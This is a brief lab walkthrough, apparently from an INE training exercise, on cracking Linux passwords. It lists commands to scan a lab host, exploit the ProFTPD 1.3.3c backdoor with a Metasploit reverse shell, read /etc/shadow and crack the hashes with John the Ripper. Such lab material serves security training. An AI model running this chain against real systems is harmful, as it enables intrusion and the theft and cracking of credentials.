Password Cracker: Linux

Lab Environment

In this lab environment, you will be provided with GUI access to a Kali machine. The target machine running a vulnerable application will be accessible at demo.ine.local.

Objective: Run the following auxiliary module against the target:

  • auxiliary/analyze/crack_linux

Tools

The best tools for this lab are:

  • Nmap

  • Metasploit Framework

Writeup

nmap -sSVC demo.ine.local
msfconsole
use exploit/unix/ftp/proftpd_133c_backdoor
set payload payload/cmd/unix/reverse
set rhosts demo.ine.local
set lhost 192.25.125.2
run
cat /etc/shadow
john hash --wordlist=/usr/share/wordlists/rockyou.txt

Last updated